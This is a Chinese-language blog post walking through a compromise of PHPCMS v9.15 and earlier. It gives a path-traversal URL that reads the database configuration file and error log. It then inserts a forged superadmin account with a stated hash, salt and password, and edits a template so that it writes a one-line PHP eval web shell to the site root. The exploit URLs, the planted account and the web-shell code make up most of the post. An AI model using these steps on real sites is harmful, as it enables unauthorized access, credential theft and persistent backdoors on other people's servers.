溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

phpcmsv9.15以下任意文件讀取漏洞

發布時間:2020-07-10 17:52:19 來源:網絡 閱讀:1940 作者:KBK影院 欄目:web開發

http://www.xx.com/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=..\/..\/caches/configs/database.php

成功讀取數據庫信息如下:
phpcmsv9.15以下任意文件讀取漏洞 

爆網站路徑:

http://www.xx.com/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=..\/..\/caches/error_log.php



phpcmsv9.15以下任意文件讀取漏洞 


打開phpcmsV9數據庫并且找到admin表,向表中添加一條數據,因為我們沒法破解他的密碼那么咱們就自己

添加一個用戶以便能夠登錄后臺操作:

Username:admin password: 748b4dfa3a7159c1eb1baa46f222f9b8 roleid:1 encrypt:C6mB9p

注意這幾項必須添負責登錄不了的。應為這條記錄的意思是添加用戶名為admin,密碼為:creturn.com的超級管理員



phpcmsv9.15以下任意文件讀取漏洞 

后臺登錄地址:localhost/index.php?m=admin

用戶名:admin 密碼:creturn.com

登錄后臺后我們找到界面-》模版風格-》選擇默認模版點擊詳情列表


phpcmsv9.15以下任意文件讀取漏洞 

然后點擊里面的search目錄下面的index.html右側的編輯

phpcmsv9.15以下任意文件讀取漏洞 

修改其模版為:

  1. <?php $shell = '<?php @eval($_POST[cmd]);?>';file_put_contents('shell.php',$shell);?>

復制代碼

提交保存

然后訪問:localhost/index.php?m=search

會在根目錄生成一個shell.php的一句話,我們連接看看


phpcmsv9.15以下任意文件讀取漏洞 

可以看到已經拿到shell,記得把修改的模版改回去。

或者可以直接通過mysql數據庫及爆出的路徑寫一句話

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

亚洲午夜精品一区二区_中文无码日韩欧免_久久香蕉精品视频_欧美主播一区二区三区美女